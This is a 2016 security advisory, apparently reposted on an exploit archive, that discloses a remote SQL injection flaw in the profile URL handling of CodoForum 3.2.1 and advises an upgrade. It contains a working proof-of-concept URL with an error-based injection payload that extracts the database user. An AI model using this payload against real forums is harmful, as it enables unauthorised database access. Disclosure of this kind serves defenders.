Home / os / winmobile

CodoForum 3.2.1 SQL Injection

Posted on 26 July 2016

1. Advisory Information ======================================== Title : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability Vendor Homepage : https://codoforum.com/ Remotely Exploitable : Yes Versions Affected : Prior to 3.2.1 Tested on : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5 Vulnerability : SQL Injection (Critical/High) Date : 23.07.2016 Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) 2. CREDIT ======================================== This vulnerability was identified during penetration test by Yakir Wizman 3. Description ======================================== The script that parses the request URL and displays user profile depending on the retrieved id does not use proper input validation against SQL injection. 4. TECHNICAL DETAILS & POC ======================================== SQL Injection Proof of Concept ---------------------------------------- Example for fetching current user database: http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610))) 5. SOLUTION ======================================== Upgrade to the latest version v3.4 build 19

 

TOP